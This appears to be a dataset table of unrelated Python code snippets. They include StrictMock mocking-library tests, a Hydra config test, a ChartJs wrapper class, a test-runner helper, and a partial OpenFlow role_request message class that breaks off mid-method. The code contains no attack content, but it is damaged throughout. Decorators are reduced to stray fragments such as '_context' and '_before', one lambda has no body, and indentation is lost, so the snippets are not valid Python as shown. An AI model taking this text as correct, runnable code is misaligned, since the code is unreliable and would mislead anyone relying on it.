code stringlengths 281 23.7M |
|---|
('StrictMock')
def strict_mock(context):
def assertRaisesWithMessage(self, exception, msg):
with self.assertRaises(exception) as cm:
(yield)
ex_msg = str(cm.exception)
self.assertEqual(ex_msg, msg, 'Expected exception {}.{} message to be\n{}\nbut got\n{}.'.format(exception.__module__, exception.__name__, repr(msg), repr(ex_msg)))
def assertRaisesWithRegexMessage(self, exception, rgx):
with self.assertRaises(exception) as cm:
(yield)
ex_msg = str(cm.exception)
if (not re.search(rgx, ex_msg)):
self.assertEqual(ex_msg, rgx, 'Expected exception {}.{} message to match regex\n{}\nbut got\n{}.'.format(exception.__module__, exception.__name__, repr(rgx), repr(ex_msg)))
def caller_filename(self):
current_module = sys.modules[__name__]
filename = (inspect.getsourcefile(current_module) or inspect.getfile(current_module))
return filename
_context
def can_access_attributes(context):
def can_access_attributes(self):
self.mock_function.attribute = 'value'
self.assertEqual(self.mock_function.attribute, 'value')
self.assertEqual(getattr(self.mock_function, 'attribute'), 'value')
setattr(self.strict_mock, self.test_method_name, self.mock_function)
mocked_metod = getattr(self.strict_mock, self.test_method_name)
self.assertEqual(getattr(mocked_metod, 'attribute'), 'value')
setattr(mocked_metod, 'new_attribute', 'new_value')
self.assertEqual(getattr(mocked_metod, 'new_attribute'), 'new_value')
delattr(mocked_metod, 'new_attribute')
self.assertFalse(hasattr(mocked_metod, 'new_attribute'))
_context
def without_template(context):
context.memoize('strict_mock', (lambda self: StrictMock()))
def strict_mock_rgx(self):
return (('<StrictMock 0x{:02X} '.format(id(self.strict_mock)) + re.escape(self.caller_filename)) + ':\\d+>')
context.memoize('value', (lambda self: ))
context.memoize('test_method_name', (lambda self: 'some_method'))
context.memoize('mock_function', (lambda self: (lambda : None)))
context.merge_context('can access attributes')
def raises_when_an_undefined_attribute_is_accessed(self):
name = 'undefined_attribute'
with self.assertRaisesWithRegexMessage(AttributeError, f"'{name}' was not set for {self.strict_mock}."):
getattr(self.strict_mock, name)
def allows_mocking_any_attribute(self):
self.strict_mock.any_attribute = self.value
self.assertEqual(self.strict_mock.any_attribute, self.value)
def allows_deleting_a_mocked_attribute(self):
name = 'attr_name'
setattr(self.strict_mock, name, self.value)
self.assertTrue(hasattr(self.strict_mock, name))
delattr(self.strict_mock, name)
with self.assertRaisesWithRegexMessage(AttributeError, f"'{name}' was not set for {self.strict_mock}."):
getattr(self.strict_mock, name)
def allows_mocking_any_method(self):
def value_plus(b):
return (self.value + b)
self.strict_mock.any_method = value_plus
plus = 2341
self.assertEqual(self.strict_mock.any_method(plus), (self.value + plus))
def allows_mocking_context_manager_methods(self):
enter_mock = 'something'
self.strict_mock.__enter__ = (lambda : enter_mock)
self.strict_mock.__exit__ = (lambda exc_type, exc_value, traceback: None)
with self.strict_mock as target:
self.assertEqual(target, enter_mock)
def attribute_type_is_maintained(self):
callable_attr = CallableObject()
self.strict_mock.callable_attr = callable_attr
attr = {1: 2}
self.strict_mock.attr = attr
self.assertEqual(type(self.strict_mock.callable_attr), type(callable_attr))
self.assertEqual(type(self.strict_mock.attr), type(attr))
_context
def with_a_template(context):
_context
def by_subclassing_StrictMock(context):
def strict_mock(self):
return TemplateStrictMock()
def overriding_regular_methods_work(self):
self.assertEqual(self.strict_mock.instance_method('Hello'), 'mock')
def overriding_magic_methods_work(self):
self.assertEqual(len(self.strict_mock), 100)
def type_validation_works(self):
with self.assertRaises(TypeCheckError):
self.strict_mock.static_method('whatever')
def hash_works(self):
d = {}
d[self.strict_mock] = 'value'
self.assertEqual(d[self.strict_mock], 'value')
def cant_set_hash(self):
with self.assertRaises(UnsupportedMagic):
self.strict_mock.__hash__ = (lambda : 0)
_context
def given_as_an_argument(context):
_context
def sync_attributes(context):
context.memoize('default_context_manager', (lambda self: False))
context.memoize('type_validation', (lambda self: True))
def runtime_attr(self):
return 'some_runtime_attr'
def set_trim_path_prefix(self):
original_trim_path_prefix = StrictMock.TRIM_PATH_PREFIX
StrictMock.TRIM_PATH_PREFIX = ''
def unpatch(self):
StrictMock.TRIM_PATH_PREFIX = original_trim_path_prefix
def template(self):
return Template
def strict_mock(self):
return StrictMock(self.template, runtime_attrs=[self.runtime_attr], default_context_manager=self.default_context_manager, type_validation=self.type_validation)
def strict_mock_rgx(self):
return (('<StrictMock 0x{:02X} template={} '.format(id(self.strict_mock), '{}.{}'.format(self.template.__module__, self.template.__name__)) + re.escape(self.caller_filename)) + ':\\d+>')
def mock_function(self):
def mock_function(message):
return 'mock: {}'.format(message)
return mock_function
_context
def non_callable_attributes(context):
def raises_when_an_undefined_attribute_is_accessed(self):
attr_name = 'non_callable'
with self.assertRaisesWithRegexMessage(UndefinedAttribute, f''''{attr_name}' is not set.
{self.strict_mock_rgx} must have a value set for this attribute if it is going to be accessed.'''):
getattr(self.strict_mock, attr_name)
def shows_the_correct_file_and_linenum_when_raising_when_an_undefined_attribute_is_accessed(self):
attr_name = 'non_callable'
with self.assertRaisesWithRegexMessage(UndefinedAttribute, f''''{attr_name}' is not set.
{self.strict_mock_rgx} must have a value set for this attribute if it is going to be accessed.'''):
getattr(self.strict_mock, attr_name)
def raises_when_an_non_existing_attribute_is_accessed(self):
attr_name = 'non_existing_attr'
with self.assertRaisesWithRegexMessage(AttributeError, f"'{attr_name}' was not set for {self.strict_mock_rgx}."):
getattr(self.strict_mock, attr_name)
def raises_when_setting_non_existing_attributes(self):
attr_name = 'non_existing_attr'
with self.assertRaisesWithRegexMessage(NonExistentAttribute, f"'{attr_name}' is not part of the API.*"):
setattr(self.strict_mock, attr_name, 'whatever')
def allows_existing_attributes_to_be_set(self):
new_value = 'new value'
self.strict_mock.non_callable = new_value
self.assertEqual(self.strict_mock.non_callable, new_value)
def allows_init_set_attributes_to_be_set(self):
new_value = (lambda msg: f'hello {msg}')
self.strict_mock.runtime_attr_from_init = new_value
self.assertEqual(self.strict_mock.runtime_attr_from_init('world'), 'hello world')
def allows_parent_init_set_attributes_to_be_set(self):
new_value = 'new value'
self.strict_mock.parent_runtime_attr_from_init = new_value
self.assertEqual(self.strict_mock.parent_runtime_attr_from_init, new_value)
def can_set_runtime_attrs(self):
value = 3412
setattr(self.strict_mock, self.runtime_attr, value)
self.assertEqual(getattr(self.strict_mock, self.runtime_attr), value)
def can_set_slots_attribute(self):
value = 3412
setattr(self.strict_mock, 'slot_attribute', value)
self.assertEqual(getattr(self.strict_mock, 'slot_attribute'), value)
def attribute_type_is_maintained(self):
non_callable = 'non callable'
self.strict_mock.non_callable = non_callable
self.assertEqual(type(self.strict_mock.non_callable), type(non_callable))
_context
def type_validation(context):
def allows_setting_valid_type(self):
self.strict_mock.non_callable = 'valid'
def raises_with_invalid_template(self):
with self.assertRaises(ValueError):
StrictMock(dict())
def allows_setting_valid_type_with_templated_mock(self):
self.strict_mock.non_callable = unittest.mock.Mock(spec=str)
self.strict_mock.non_callable = StrictMock(template=str)
def allows_setting_valid_type_with_generic_mock(self):
self.strict_mock.non_callable = unittest.mock.Mock()
self.strict_mock.non_callable = StrictMock()
def raises_TypeCheckError_when_setting_invalid_type(self):
with self.assertRaises(TypeCheckError):
self.strict_mock.non_callable = 1
def raises_TypeCheckError_when_setting_with_mock_with_invalid_type_template(self):
with self.assertRaises(TypeCheckError):
self.strict_mock.non_callable = unittest.mock.Mock(spec=int)
with self.assertRaises(TypeCheckError):
self.strict_mock.non_callable = StrictMock(template=int)
_context('with type_validation=False')
def with_type_validation_False(context):
context.memoize('type_validation', (lambda self: False))
def allows_setting_invalid_type(self):
self.strict_mock.non_callable = 1
def allows_setting_with_mock_with_invalid_type_template(self):
self.strict_mock.non_callable = unittest.mock.Mock(spec=int)
self.strict_mock.non_callable = StrictMock(template=int)
_context
def callable_attributes(context):
_context
def callable_attribute_tests(context):
_context
def failures(context):
def raises_when_setting_a_non_callable_value(self):
with self.assertRaisesWithRegexMessage(NonCallableValue, f''''{self.test_method_name}' can not be set with a non-callable value.
{self.strict_mock_rgx} template class requires this attribute to be callable.'''):
setattr(self.strict_mock, self.test_method_name, 'non callable')
def raises_when_an_undefined_method_is_accessed(self):
with self.assertRaisesWithRegexMessage(UndefinedAttribute, f''''{self.test_method_name}' is not set.
{self.strict_mock_rgx} must have a value set for this attribute if it is going to be accessed.'''):
getattr(self.strict_mock, self.test_method_name)
_context
def signature_and_type_validation(context):
def works_with_wraps(self):
test_method_name = '{}_wrapped'.format(self.test_method_name)
setattr(self.strict_mock, test_method_name, (lambda message: 'mock: {}'.format(message)))
method = getattr(self.strict_mock, test_method_name)
self.assertEqual(method('hello'), 'mock: hello')
_context
def common_examples(context, type_validation):
if type_validation:
def fails_on_invalid_signature_call(self):
setattr(self.strict_mock, self.test_method_name, (lambda message, extra: None))
with self.assertRaises(TypeError):
getattr(self.strict_mock, self.test_method_name)('message', 'extra')
def fails_on_invalid_argument_type_call(self):
setattr(self.strict_mock, self.test_method_name, (lambda message: None))
with self.assertRaises(TypeCheckError):
getattr(self.strict_mock, self.test_method_name)(1234)
def fails_on_invalid_return_type(self):
setattr(self.strict_mock, self.test_method_name, (lambda message: 1234))
with self.assertRaises(TypeCheckError):
getattr(self.strict_mock, self.test_method_name)('message')
else:
def passes_on_invalid_argument_type_call(self):
setattr(self.strict_mock, self.test_method_name, (lambda message: 'mock'))
self.assertEqual(getattr(self.strict_mock, self.test_method_name)(1), 'mock')
def passes_on_invalid_return_type(self):
setattr(self.strict_mock, self.test_method_name, (lambda message: 1234))
self.assertEqual(getattr(self.strict_mock, self.test_method_name)('message'), 1234)
_context('with type_validation=True')
def with_type_validation_True(context):
context.merge_context('common examples', type_validation=True)
_context('with type_validation=False')
def with_type_validation_False(context):
context.memoize('type_validation', (lambda self: False))
context.merge_context('common examples', type_validation=False)
def attribute_type_is_maintained(self):
setattr(self.strict_mock, self.test_method_name, self.mock_function)
self.assertEqual(type(getattr(self.strict_mock, self.test_method_name)), type(self.mock_function))
_context
def success(context):
def isinstance_is_true_for_template(self):
self.assertTrue(isinstance(self.strict_mock, self.template))
self.assertTrue(isinstance(self.strict_mock, self.template.mro()[1]))
_context
def method_mocking(context):
context.merge_context('can access attributes')
def after(self):
self.assertEqual(getattr(self.strict_mock, self.test_method_name)('hello'), 'mock: hello')
def can_mock_with_function(self):
setattr(self.strict_mock, self.test_method_name, self.mock_function)
def can_mock_with_lambda(self):
setattr(self.strict_mock, self.test_method_name, (lambda message: 'mock: {}'.format(message)))
def can_mock_with_instancemethod(self):
class SomeClass():
def mock_method(self, message):
return 'mock: {}'.format(message)
setattr(self.strict_mock, self.test_method_name, SomeClass().mock_method)
def works_with_mock_callable(self):
self.mock_callable(self.template, 'class_method').to_return_value(None)
strict_mock2 = StrictMock(self.template)
strict_mock2.instance_method = (lambda *args, **kwargs: None)
_context
def instance_methods(context):
def before(self):
self.test_method_name = 'instance_method'
context.merge_context('callable attribute tests')
_context
def static_methods(context):
def before(self):
self.test_method_name = 'static_method'
context.merge_context('callable attribute tests')
_context
def class_methods(context):
def before(self):
self.test_method_name = 'class_method'
context.merge_context('callable attribute tests')
_context
def magic_methods(context):
def raises_when_an_undefined_magic_method_is_accessed(self):
with self.assertRaisesWithRegexMessage(UndefinedAttribute, f''''__abs__' is not set.
{self.strict_mock_rgx} must have a value set for this attribute if it is going to be accessed.'''):
abs(self.strict_mock)
def can_set_magic_methods(self):
value = 23412
self.strict_mock.__abs__ = (lambda : value)
self.assertEqual(abs(self.strict_mock), value)
('bool() works')
def bool_works(self):
with self.assertRaisesWithRegexMessage(UndefinedAttribute, f''''__len__' is not set.
{self.strict_mock_rgx} must have a value set for this attribute if it is going to be accessed.'''):
bool(self.strict_mock)
self.strict_mock.__len__ = (lambda : 0)
self.assertEqual(bool(self.strict_mock), False)
_context
def context_manager(context):
def template(self):
return ContextManagerTemplate
def context_manager_raises_UndefinedAttribute(self):
with self.assertRaisesWithRegexMessage(UndefinedAttribute, f''''__enter__' is not set.
{self.strict_mock_rgx} must have a value set for this attribute if it is going to be accessed.'''):
with self.strict_mock:
pass
_context('with default_context_manager=True')
def with_default_context_manager_True(context):
context.memoize('default_context_manager', (lambda self: True))
def it_yields_the_mock(self):
with self.strict_mock as target:
self.assertTrue((target is self.strict_mock))
def works_with_exitstack(self):
with contextlib.ExitStack() as exit_stack:
target = exit_stack.enter_context(self.strict_mock)
self.assertTrue((target is self.strict_mock))
_context
def string_template(context):
async def undefined_attribute(self) -> None:
with self.assertRaises(UndefinedAttribute):
StrictMock(template=str).join
async def attribute_error(self) -> None:
with self.assertRaises(AttributeError):
StrictMock(template=str).garbage
_context
def async_attributes(context):
_before
async def default_context_manager(self):
return False
_before
async def type_validation(self):
return True
_before
async def strict_mock(self):
get_strict_mock = (lambda : StrictMock(template=Template, default_context_manager=self.default_context_manager, type_validation=self.type_validation))
return get_strict_mock()
_context
def async_method_tests(context):
async def raises_when_setting_a_non_callable_value(self):
with self.assertRaisesWithRegexMessage(NonCallableValue, f''''{self.method_name}' can not be set with a non-callable value.
<StrictMock .+> template class requires this attribute to be callable.'''):
setattr(self.strict_mock, self.method_name, 'not callable')
_context
def signature_and_type_validation(context):
_context
def common_examples(context, type_validation):
if type_validation:
async def fails_on_wrong_signature_call(self):
async def mock(msg):
return 'mock '
setattr(self.strict_mock, self.method_name, mock)
with self.assertRaises(TypeError):
(await getattr(self.strict_mock, self.method_name)('hello', 'wrong'))
async def can_mock_with_async_function(self):
async def mock(msg):
return ('mock ' + msg)
setattr(self.strict_mock, self.method_name, mock)
self.assertEqual((await getattr(self.strict_mock, self.method_name)('hello')), 'mock hello')
async def can_not_mock_with_sync_function(self):
def mock(msg):
return ('mock ' + msg)
setattr(self.strict_mock, self.method_name, mock)
with self.assertRaises(NonAwaitableReturn):
((await getattr(self.strict_mock, self.method_name)('hello')),)
async def fails_on_wrong_type_call(self):
async def mock(msg):
return 'mock '
setattr(self.strict_mock, self.method_name, mock)
with self.assertRaises(TypeCheckError):
(await getattr(self.strict_mock, self.method_name)(1))
async def fails_on_invalid_return_type(self):
async def mock(message):
return 1234
setattr(self.strict_mock, self.method_name, mock)
with self.assertRaises(TypeCheckError):
(await getattr(self.strict_mock, self.method_name)('message'))
else:
async def passes_on_wrong_signature_call(self):
async def mock(msg, extra):
return 'mock '
setattr(self.strict_mock, self.method_name, mock)
(await getattr(self.strict_mock, self.method_name)('hello', 'wrong'))
async def can_mock_with_async_function(self):
async def mock(msg):
return ('mock ' + msg)
setattr(self.strict_mock, self.method_name, mock)
self.assertEqual((await getattr(self.strict_mock, self.method_name)('hello')), 'mock hello')
async def can_mock_with_sync_function(self):
def mock(msg):
return ('mock ' + msg)
setattr(self.strict_mock, self.method_name, mock)
self.assertEqual(getattr(self.strict_mock, self.method_name)('hello'), 'mock hello')
async def passes_on_wrong_type_call(self):
async def mock(msg):
return 'mock '
setattr(self.strict_mock, self.method_name, mock)
(await getattr(self.strict_mock, self.method_name)(1))
async def passes_on_invalid_return_type(self):
async def mock(message):
return 1234
setattr(self.strict_mock, self.method_name, mock)
self.assertEqual((await getattr(self.strict_mock, self.method_name)('message')), 1234)
_context('with type_validation=True')
def with_type_validation_True(context):
context.merge_context('common examples', type_validation=True)
_context('with type_validation=False')
def with_type_validation_False(context):
_before
async def type_validation(self):
return False
context.merge_context('common examples', type_validation=False)
async def attribute_type_is_maintained(self):
async def mock(msg):
return ('mock ' + msg)
setattr(self.strict_mock, self.method_name, mock)
self.assertEqual(type(getattr(self.strict_mock, self.method_name)), type(mock))
_context
def instance_methods(context):
_before
async def method_name(self):
return 'async_instance_method'
context.merge_context('async method tests')
_context
def static_methods(context):
_before
async def method_name(self):
return 'async_static_method'
context.merge_context('async method tests')
_context
def class_methods(context):
_before
async def method_name(self):
return 'async_class_method'
context.merge_context('async method tests')
_context
def async_iterator(context):
async def default_raises_UndefinedAttribute(self):
with self.assertRaisesWithRegexMessage(UndefinedAttribute, "'__aiter__' is not set.\n<StrictMock .+> must have a value set for this attribute if it is going to be accessed."):
async for _ in self.strict_mock:
pass
async def can_mock_async_iterator(self):
self.strict_mock.__aiter__ = (lambda : self.strict_mock)
expected_values = [3, 4, 5]
mock_values = copy.copy(expected_values)
async def mock():
if mock_values:
return mock_values.pop()
raise StopAsyncIteration
self.strict_mock.__anext__ = mock
yielded_values = []
async for v in self.strict_mock:
yielded_values.append(v)
self.assertEqual(expected_values, list(reversed(yielded_values)))
_context
def async_context_manager(context):
async def default_raises_UndefinedAttribute(self):
with self.assertRaisesWithRegexMessage(UndefinedAttribute, "'__aenter__' is not set.\n<StrictMock .+> must have a value set for this attribute if it is going to be accessed."):
async with self.strict_mock:
pass
async def can_mock_async_context_manager(self):
async def aenter():
return 'yielded'
async def aexit(exc_type, exc_value, traceback):
pass
self.strict_mock.__aenter__ = aenter
self.strict_mock.__aexit__ = aexit
async with self.strict_mock as m:
assert (m == 'yielded')
_context('default_context_manager=True')
def default_context_manager_True(context):
_before
async def default_context_manager(self):
return True
async def it_yields_the_mock(self):
async with self.strict_mock as m:
assert (id(self.strict_mock) == id(m))
async def works_with_exitstack(self):
async with contextlib.AsyncExitStack() as exit_stack:
target = (await exit_stack.enter_async_context(self.strict_mock))
self.assertTrue((target is self.strict_mock))
_context
def making_copies(context):
context.memoize('strict_mock', (lambda self: StrictMock(template=Template)))
context.memoize('key', (lambda self: 1))
context.memoize('value', (lambda self: 2))
context.memoize('attr', (lambda self: {self.key: self.value}))
def set_attributes(self):
self.strict_mock.attr = self.attr
self.strict_mock.instance_method = (lambda arg: 'mock')
self.strict_mock.__eq__ = (lambda other: True)
('copy.copy()')
def copy_copy(self):
strict_mock_copy = copy.copy(self.strict_mock)
self.assertEqual(id(self.strict_mock.attr), id(strict_mock_copy.attr))
self.assertEqual(id(self.strict_mock.instance_method), id(strict_mock_copy.instance_method))
self.assertEqual(self.strict_mock.instance_method('hello'), strict_mock_copy.instance_method('hello'))
('copy.deepcopy()')
def copy_deepcopy(self):
strict_mock_copy = copy.deepcopy(self.strict_mock)
self.assertEqual(self.strict_mock.attr, strict_mock_copy.attr)
self.assertNotEqual(id(self.strict_mock.attr), id(strict_mock_copy.attr))
self.assertEqual(self.strict_mock.attr, strict_mock_copy.attr)
self.assertEqual(self.strict_mock.instance_method('hello'), strict_mock_copy.instance_method('hello'))
self.assertEqual(self.strict_mock.instance_method('meh'), 'mock')
_context('with TRIM_PATH_PREFIX set')
def with_trim_path_prefix_set(context):
def testslide_root(self):
current_module = sys.modules[__name__]
filename = (inspect.getsourcefile(current_module) or inspect.getfile(current_module))
dirname = os.sep.join(filename.split(os.sep)[:(- 2)])
return (dirname + '/')
def set_trim_path_prefix(self):
original_trim_path_prefix = StrictMock.TRIM_PATH_PREFIX
StrictMock.TRIM_PATH_PREFIX = self.testslide_root
def unpatch(self):
StrictMock.TRIM_PATH_PREFIX = original_trim_path_prefix
def caller_filename(self):
current_module = sys.modules[__name__]
filename = (inspect.getsourcefile(current_module) or inspect.getfile(current_module))
split = filename.split(self.testslide_root)
if ((len(split) == 2) and (not split[0])):
filename = split[1]
return filename
def template(self):
return Template
def strict_mock(self):
return StrictMock(template=self.template)
('__str__ trims prefix')
def it_trims_prefix(self):
self.assertTrue(re.search((('<StrictMock 0x{:02X} template={} '.format(id(self.strict_mock), '{}.{}'.format(self.template.__module__, self.template.__name__)) + re.escape(self.caller_filename)) + ':\\d+>'), str(self.strict_mock)))
_context
def check_return_type_validation(context):
_context
def run_context(context, target):
def default_validation_at_mock_callable_level(self):
self.mock_callable(target, 'instance_method').to_return_value(1)
if (isinstance(target, StrictMock) and (not target._type_validation)):
target.instance_method(arg1='', arg2='')
else:
with self.assertRaises(TypeCheckError):
target.instance_method(arg1='', arg2='')
def enforce_validation_at_mock_callable_level(self):
self.mock_callable(target, 'instance_method', type_validation=True).to_return_value(1)
with self.assertRaises(TypeCheckError):
target.instance_method(arg1='', arg2='')
def ignore_validation_at_mock_callable_level(self):
self.mock_callable(target, 'instance_method', type_validation=False).to_return_value(1)
target.instance_method(arg1='', arg2='')
_context
def using_concrete_instance(context):
context.merge_context('run context', target=sample_module.Target())
_context
def using_strict_mock(context):
context.merge_context('run context', target=StrictMock(sample_module.ParentTarget))
_context
def using_strict_mock_with_disabled_type_validation(context):
context.merge_context('run context', target=StrictMock(sample_module.ParentTarget, type_validation=False)) |
def validate_not_monthly_to_quarterly(source_fiscal_period, destination_fiscal_period):
if ((not is_quarter_final_period(source_fiscal_period)) and is_quarter_final_period(destination_fiscal_period)):
raise RuntimeError('Unfortunately, copying from a monthly period to a quarterly period is not supported. This is because we cannot currently fabricate quarterly records from monthly data.') |
('config_name,overrides,expected', [param('legacy_override_hydra', [], raises(ConfigCompositionException, match=re.escape(dedent(" Multiple values for hydra/help. To override a value use 'override hydra/help: custom1'"))), id='legacy_override_hydra-error'), param('legacy_override_hydra2', [], raises(ConfigCompositionException, match=re.escape(dedent(" Multiple values for hydra/output. To override a value use 'override hydra/output: disabled'"))), id='legacy_override_hydra2-error'), param('legacy_override_hydra_wrong_order', [], raises(ConfigCompositionException, match=re.escape(dedent(" Multiple values for hydra/help. To override a value use 'override hydra/help: custom1'"))), id='legacy_override_hydra_wrong_order')])
('version_base', ['1.2', None])
def test_legacy_override_hydra_version_base_1_2(config_name: str, overrides: List[str], expected: DefaultsTreeNode, version_base: Optional[str], hydra_restore_singletons: Any) -> None:
version.setbase(version_base)
_test_defaults_tree_impl(config_name=config_name, input_overrides=overrides, expected=expected, prepend_hydra=True) |
class ChartJs(JsCanvas.Canvas):
display_value = 'inline-block'
def __init__(self, component: primitives.HtmlModel, js_code: str=None, set_var: bool=True, is_py_data: bool=True, page: primitives.PageModel=None):
self.htmlCode = (js_code if (js_code is not None) else component.html_code)
(self.varName, self.varData, self.__var_def) = (("document.getElementById('%s')" % self.htmlCode), '', None)
(self.component, self.page) = (component, page)
self._js = []
(self._jquery, self._jquery_ui, self._d3) = (None, None, None)
def val(self):
return JsObjects.JsObjects.get(('{%s: {value: %s, timestamp: Date.now(), offset: new Date().getTimezoneOffset()}}' % (self.htmlCode, self.content.toStr())))
def by_name(self) -> JsNodeDom.JsDomsList:
if (self.component.attr.get('name') is not None):
return JsNodeDom.JsDomsList(None, ("document.getElementsByName('%s')" % self.component.attr.get('name')), page=self.page)
return self
def isInViewPort(self) -> JsObjects.JsObject.JsObject:
flag = JsBoolean.JsBoolean('!(rect.bottom < 0 || rect.top - viewHeight >= 0)', js_code='visibleFlag', set_var=True, is_py_data=False)
flag._js.insert(0, self.component.js.viewHeight.setVar('viewHeight'))
flag._js.insert(0, self.getBoundingClientRect().setVar('rect'))
return JsFncs.JsAnonymous(flag.r).return_('visibleFlag').call()
def onViewPort(self, js_funcs: types.JS_FUNCS_TYPES):
return self.component.js.if_(self.isInViewPort, js_funcs)
def content(self):
return JsHtml.ContentFormatters(self.page, ('%s.value' % self.varName))
def empty(self):
return ('%s.value = ""' % self.varName)
def events(self) -> JsNodeDom.JsDomEvents:
return JsNodeDom.JsDomEvents(self.component)
def jquery(self) -> JsQuery.JQuery:
if (self._jquery is None):
self._jquery = JsQuery.JQuery(component=self.component, selector=JsQuery.decorate_var(('#%s' % self.component.htmlCode)), set_var=False)
return self._jquery
def d3(self) -> JsD3.D3Select:
if (self._d3 is None):
self._d3 = JsD3.D3Select(component=self.component, selector=("d3.select('#%s')" % self.component.htmlCode))
return self._d3
def objects(self) -> JsObjects.JsObjects:
return JsObjects.JsObjects(self.page)
def format(self) -> JsHtml.Formatters:
return JsHtml.Formatters(self.page, self.content.toStr())
def style(self, attrs: dict):
styles = []
for (k, v) in attrs.items():
if ('-' in k):
split_css = k.split('-')
k = ('%s%s' % (split_css[0], ''.join([c.title() for c in split_css[1:]])))
styles.append(('this.style.%s = %s' % (k, json.dumps(v))))
return JsUtils.jsConvertFncs(styles, toStr=True)
def registerFunction(self, func_name: str, js_funcs: types.JS_FUNCS_TYPES, pmts: Optional[dict]=None, profile: types.PROFILE_TYPE=None):
js_data = JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile)
self.page.properties.js.add_function(func_name, js_data, pmts)
return self
def hide(self):
return self.css('display', 'none')
def show(self, inline: Optional[str]=None, duration: Optional[int]=None, display_value: Optional[str]=None):
display_value = (display_value or self.display_value)
if (duration is not None):
return super(JsHtml, self).show(('inline-block' if inline else display_value), duration)
return JsUtils.jsConvertData(self.css('display', ('inline-block' if inline else display_value)), None)
def visible(self, data, inline: Optional[str]=None, display_value: Optional[str]=None):
data = JsUtils.jsConvertData(data, None)
return JsObjects.JsVoid(('if(%s){%s} else{%s}' % (data, self.show(inline, display_value=display_value).r, self.hide().r)))
def select(self):
return JsObjects.JsObjects.get(('%s.select()' % self.varName))
def toggle(self, attr: str='display', js_val1: Optional[str]=None, js_val2: str='none'):
if ((attr == 'display') and (js_val1 is None)):
js_val1 = self.display_value
return JsIf.JsIf((self.css(attr) == js_val2), [self.css(attr, js_val1)]).else_([self.css(attr, js_val2)])
def highlight(self, css_attrs: Optional[dict]=None, time_event: int=1000):
if (css_attrs is None):
(css_attrs, css_attrs_origin) = ({}, {})
for (k, v) in Defaults_html.HTML_HIGHLIGHT.items():
if isinstance(v, dict):
(dyn_attrs, dyn_attrs_orign) = ({}, {})
if ('color' in v):
dyn_attrs['color'] = getattr(self.page.theme, *v['color'])
dyn_attrs_orign['color'] = self.page.theme.greys[0]
css_attrs[k] = (v['attr'] % dyn_attrs)
css_attrs_origin[k] = (self.component.attr[k] if (k in self.component.attr) else (v['attr'] % dyn_attrs_orign))
else:
css_attrs[k] = v
css_attrs_origin[k] = (self.component.attr[k] if (k in self.component.attr) else 'none')
else:
css_attrs_origin = {}
for k in css_attrs.keys():
if (k in self.component.attr):
css_attrs_origin[k] = self.component.attr[k]
else:
css_attrs_origin[k] = 'none'
return ('%s; setTimeout(function(){%s}, %s)\n ' % (self.css(css_attrs).r, self.css(css_attrs_origin).r, time_event))
def loadHtml(self, components: List[primitives.HtmlModel], append: bool=False, profile: types.PROFILE_TYPE=None):
if (not isinstance(components, list)):
components = [components]
js_funcs = []
for (i, h) in enumerate(components):
h.options.managed = False
js_funcs.append(self.page.js.objects.new(str(h), isPyData=True, varName=('obj_%s' % i)))
js_funcs.append(self.innerHTML(self.page.js.objects.get(('obj_%s' % i)), append=append).r)
return JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile)
def options(self, options: Optional[dict]=None):
opt = dict(self.component._jsStyles)
if (options is not None):
opt.update(options)
return opt
def copyToClipboard(self, clipboardCopySelector=None, with_header=True):
return JsObjects.JsVoid(("(function(canvas){var image = new Image(); image.src = canvas.toDataURL('image/png'); return image})(%s)" % self.varName))
def active(self):
if (self.component._chart__type in ['scatter', 'bubble']):
active_points = self.component.activePoints()
return JsObjects.JsObject.JsObject.get(('{x: %s, y: %s, label: %s}' % (active_points.label, JsUtils.jsWrap(('%s.data.datasets[%s].data[activePoints[0].index].y' % (active_points.js_code, active_points.num))), active_points.x)))
return JsObjects.JsObject.JsObject.get(('{x: %s, y: %s, label: %s}' % (self.component.activePoints().label, self.component.activePoints().y, self.component.activePoints().x)))
def createWidget(self, html_code: str, container: str=None, options: types.JS_DATA_TYPES=None):
self.component.options.managed = False
self.component.js_code = html_code
js_code = JsUtils.jsConvertData(self.component.js_code, None).toStr()
if js_code.startswith('window'):
js_code = js_code[7:(- 1)]
return JsUtils.jsWrap(('(function(containerId, tag, htmlCode, jsCode, ctx, attrs){\n const contDiv = document.createElement("div");\n const newDiv = document.createElement(tag);Object.keys(attrs).forEach( \n function(key) {contDiv.setAttribute(key, attrs[key]);}); newDiv.id = htmlCode;\n contDiv.appendChild(newDiv);\n if(!containerId){ document.body.appendChild(contDiv)} else {document.getElementById(containerId).appendChild(contDiv)};\n window[jsCode] = new Chart(newDiv.getContext("2d"), ctx); return newDiv;\n})(%(container)s, "%(tag)s", %(html_code)s, %(js_code)s, %(ctx)s, %(attrs)s)' % {'js_code': js_code, 'attrs': self.component.get_attrs(css_class_names=self.component.style.get_classes(), to_str=False), 'html_code': JsUtils.jsConvertData((html_code or self.component.html_code), None), 'tag': self.component.tag, 'ctx': self.component.getCtx(options), 'container': JsUtils.jsConvertData(container, None)})) |
def execute(function, filenames, verbose):
if PY3:
name = function.__name__
elif hasattr(function, 'unittest_name'):
name = function.unittest_name
else:
name = function.func_name
if verbose:
sys.stdout.write((('=' * 75) + '\n'))
sys.stdout.write(('%s(%s)...\n' % (name, ', '.join(filenames))))
try:
function(*filenames, verbose=verbose)
except Exception as exc:
info = sys.exc_info()
if isinstance(exc, AssertionError):
kind = 'FAILURE'
else:
kind = 'ERROR'
if verbose:
traceback.print_exc(limit=1, file=sys.stdout)
else:
sys.stdout.write(kind[0])
sys.stdout.flush()
else:
kind = 'SUCCESS'
info = None
if (not verbose):
sys.stdout.write('.')
sys.stdout.flush()
return (name, filenames, kind, info) |
class role_request(message):
version = 3
type = 24
def __init__(self, xid=None, role=None, generation_id=None):
if (xid != None):
self.xid = xid
else:
self.xid = None
if (role != None):
self.role = role
else:
self.role = 0
if (generation_id != None):
self.generation_id = generation_id
else:
self.generation_id = 0
return
def pack(self):
packed = []
packed.append(struct.pack('!B', self.version))
packed.append(struct.pack('!B', self.type))
packed.append(struct.pack('!H', 0))
packed.append(struct.pack('!L', self.xid))
packed.append(struct.pack('!L', self.role))
packed.append(('\x00' * 4))
packed.append(struct.pack('!Q', self.generation_id))
length = sum([len(x) for x in packed])
packed[2] = struct.pack('!H', length)
return ''.join(packed)
def unpack(reader):
obj = role_request()
_version = reader.read('!B')[0]
assert (_version == 3)
_type = reader.read('!B')[0]
assert (_type == 24)
_length = reader.read('!H')[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read('!L')[0]
obj.role = reader.read('!L')[0]
